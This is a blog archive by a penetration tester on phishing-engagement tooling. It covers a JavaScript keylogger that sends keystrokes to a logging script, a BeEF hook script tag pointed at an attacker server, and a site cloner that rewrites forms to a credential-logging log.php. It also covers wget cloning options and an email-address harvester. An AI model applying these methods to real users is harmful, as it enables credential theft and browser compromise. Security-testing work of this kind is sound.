Mastodon Hillbilly StoryTime: April 2015

Thursday, April 9, 2015

New Script/Tool: KeyLogging in JavaScript

So, you want to set up a keylogger within a website.  Ultimately it is fairly simple.  there are 2 items you will need.  First will be a way to log the keystrokes and second would be a way to capture the keystrokes.

For the logging of the key strokes, the simplest way would be with a small script similar to the following one.  This script accepts any GET or POST parameter and then logs it to the specified file.  Of course with this, it is assumed that you have a place to host this script and that the script has the proper permissions to create and write to the file.


It should be noted that I have used a version of that logging script for numerous situations, mostly for social engineering.  It works well for credential harvesting websites.  It also is useful as a simple data exfiltration script.

With that taken care of, now we need to build a way to capture the key strokes.  One of the simplest ways to go about this is demonstrated in the following code sample.  This code when included within a webpage (with the proper surrounding "script" tags) will capture every key pressed (as long as it is a printable character) and then send it off to a secondary logging script.


The previous simple key capture script has a few limitations.  The primary one is that it only captures printable characters.  Thus, key presses like [Backspace], [tab], [enter], [arrow keys], and so on will not be captured.  To account for these missing keys, it is important to not only listen for "onkeypress" but also for "onkeydown".  The following code takes this into account to provide a much more complete key capturing script.


Hopefully, you will find these scripts of use.  As always, if you have any questions/comments/criticisms, please feel free to let me know.

Monday, April 6, 2015

New Script/Tool: BeEF Restful API in python

The BeEF (Browser Exploitation Framework) Project is a penetration tool that is focused on attacking and exploiting web browsers.  You can find out more information about the BeEF project at their website as well as on their GitHub page.

How about a little more information on the tool? (not all inclusive, just some high points)
  • BeEF is written in Ruby.
  • It is bundled as part of the Kali Linux Penetration Testing Distro by default.
  • It has a large number of modules which can help in pulling information from, attacking, and exploiting a wide number of web browsers.
  • If properly configured, an attacker can launch Metasploit payloads directly from within BeEF.
  • BeEF has a RESTFUL API.
  • In order to make use of BeEF, an attacker only needs to start up BeEF and add 1 simple line of HTML to the target website.

It is these two items which makes it of particular interest during a phishing exercise/engagement.  The fact that all an attacker needs to do is add one HTML line (see below) to a website to make it work with BeEF is amazing.
<script type=text/javascript src=http://127.0.0.1:3000/hook.js></script>
Combine this with the ability to control, monitor, and pull data from BeEF using its RESTFUL API, and you have a very powerful tool for automating various aspects of a phishing exercise/engagement.

Unfortunately I could not find an implementation of the BeEF RESTFUL API for python that I was happy with.  That is why I wrote my own BeEF RESTFUL API  python module.  It can be found on GitHub at https://github.com/tatanus/beefapi  It does not incorporate all of the possible functions that the BeEF RESTFUL API allows for, but it does incorporate all of the ones I found useful.

Please take a look and use it if you find it useful.  If you have comments/criticisms/etc with the code, please feel free to let me know.

Friday, April 3, 2015

New Script/Tool: clonesite.py


As mentioned in an earlier post, I decided to write my own site cloner tool for use in my phishing exercise/engagements.  I needed a tool that would complete (or as close as I could get) clone any given site and then update any forms with links to a data collection script that I specify.

The current version of the "Site Cloner" tool is hosted on GitHub at https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/clonesite.py

In order to run the script, simply execute:
python clonesite.py <URL> <outdirectory> (optional <form action>)
where:
      <URL> = the full URL of the page to be cloned
      <outdirectory> = where do you want the files to be saved to
      <form action> = the script to execute when someone submits a form
An example would be:
python clonesite.py "http://www.safelogin.co" "safelogin" log.php
This command line would execute "clonesite.py" on the URL "http://www.safelogin.co", save all files into the directory located at "./safelogin" and finally rewrite all forms to submit to a script called "log.php".  Someone will have to create that script (log.php) later and stored in the same directory.

When the script is run, you will see verbose output similar to the following:

In this output you can see each page, link, file, and form that the script identifies and what it does with it.  Some files (binary formats such as images) are simply downloaded, where as html documents will be processed for additional links and forms.  Anytime a form is encountered, the "form tag" is rewritten.
FOUND A FORM                [<form class="form-horizontal" action="/create.php" method="GET">]
REWROTE FORM TO BE  [<form method="get" action="log.php" class="form-horizontal">]
As is shown in the above example, the form action was changed from being "/create.php" to being "log.php".  By doing this automatically, it saves time and effort by not requiring the user to go back, find, and edit all of the forms them selves.

Below is an example of what "log.php" could look like:

I hope this script is of use to you.  As always, if you have any comments/criticisms,etc, please leave a comment below.

Thursday, April 2, 2015

Phishing 101: Cloning a Site

Many phishing exercises/engagements require both the sending of a malicious email as well as the presence of a malicious website/web server. This is definitely the case where the goal is to collect credentials or to exploit the user's web browser.

Before we get into crafting and sending emails, we need to make a malicious website. There are a few ways to go about this.

Browser Exploitation

First you could create a dummy site that just has some malicious code in it and the site does not really need to display anything to the user.  This is common with browser attacks.  One example of this is when using the BeEF (Browser Exploitation Framework) project.

The BeEF Project is a penetration tool that is focused on attacking and exploiting web browsers. You can find out more information about the BeEF project at their website as well as on their GitHub page.

If you take this approach, BeEF makes it very easy in that once you have BeEF running, you can create a web page that contains a line similar to:
<script type=text/javascript src=http://127.0.0.1:3000/hook.js></script>
You would want to replace the "127.0.0.1" with the IP of the Internet facing system that BeEF is running on.  Then send an email to the target instructing them to visit the web site that you inserted that line into and then you should have a successfully compromised web browser, once the target visits the malicious website.

Information/Credential Harvesting

Now for the second type of malicious website.  This type is a web site that looks as close to 100% valid as possible and will likely be used to capture credentials or other important information such as username, password, RSA token, etc...

To make such a site, you can:
  • use "wget" to clone an existing site, then edit it
  • make it entirely by hand
  • use a tool that is designed for site cloning to dedicated tool and then edit the results

If you wish to use "wget" to clone a site, the following options will come in handy.
  • perform full clone:
    • wget -m -p -k <URL>
      • -m = Mirroring : This option turns on recursion and time-stamping, sets infinite recursion depth.
      • -p = Page Requisites : This option causes wget to download all the files that are necessary to properly display a given HTML page.
      • -k = After the download is complete, convert the links in the document to make them suitable for local viewing.
  • only clone X levels deep:
    • wget -r -l 1 -p -k 
      • -r = Enable recursion
      • -l X = Limit recursion to X levels deep
      • -p = Page Requisites : This option downloads all the files that are necessary to properly display a given HTML page.
      • -k = After the download is complete, convert the links in the document to make them suitable for local viewing.

You may ask why you would not always want to just do a full clone.  Well, if you are just wanting to capture the values entered into a particular form, you will only need to clone that page and you would not need the rest of the site.

Now that you have cloned the site (or as much of it as you need to), you will need to edit the html and make any necessary changes to the forms that you need in order to capture the credentials.  This is also the time where you would make any other edits you desire. When editing forms, it is useful to have a secondary script handy that can be used as the "action" for the form. The code sample below is a simple php script that will log all GET and POST parameters passed to it.

When creating a web site by hand, you can get a bit of a head start by opening the page you want to clone and then "view source", select it all and copy paste it into a new html document. Then as before, you will need to make any necessary changes to the html that are needed.

There are a few tools available to help such as HTTrack. According to the website,
[HTTrack] allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
Again as before, you will need to make any necessary changes to the html that are needed.

Finally, I would like to mention a script I wrote that can be used to help with cloning a site and automatically making any necessary edits to the contained forms.  The script can be found at https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/clonesite.py  I will be releasing a new blog post describing the details of this script in the next few days.

Wednesday, April 1, 2015

New Script/Tool: Email Address Finder


While performing various phishing exercises/engagements, I found myself having to identify list of potential email addresses on a regular basis.  Tools like "theHarvester" make this task easier, however, theHarvester does not just find email addresses.  It also finds associated host names and while it does search a large number of search engines, it did not search all of the ones I thought it should.

As a result, I ended up writing my own minimal script to search for email addresses across all of the search engines I could think of at the time.  The tool currently searches for email address from 8 different search engine sources:

  • google
  • bing
  • ask
  • dogpile
  • yandex
  • baidu
  • yahoo
  • duckduckgo
simply run:
python find_emails.py <target domain>
and it will start querying each of the above listed search engines for records that match
@<target domain>
and then parse the resulting output for strings that match the email regex of
[a-zA-Z0-9\.\-_]+@[a-zA-Z0-9\.\-]* + <target domain>
Once the regex has been applied, all of the identified email address are added to a list, and uniqued to produce the final list of identified potential email addresses.

I fully admit that this code is not new or unique, but I wrote it to suit my needs and if you find it useful as well, then please let me know.  If you have suggested improvements, find errors, etc, please let me know as well.

You can find this code located at: https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/find_emails.py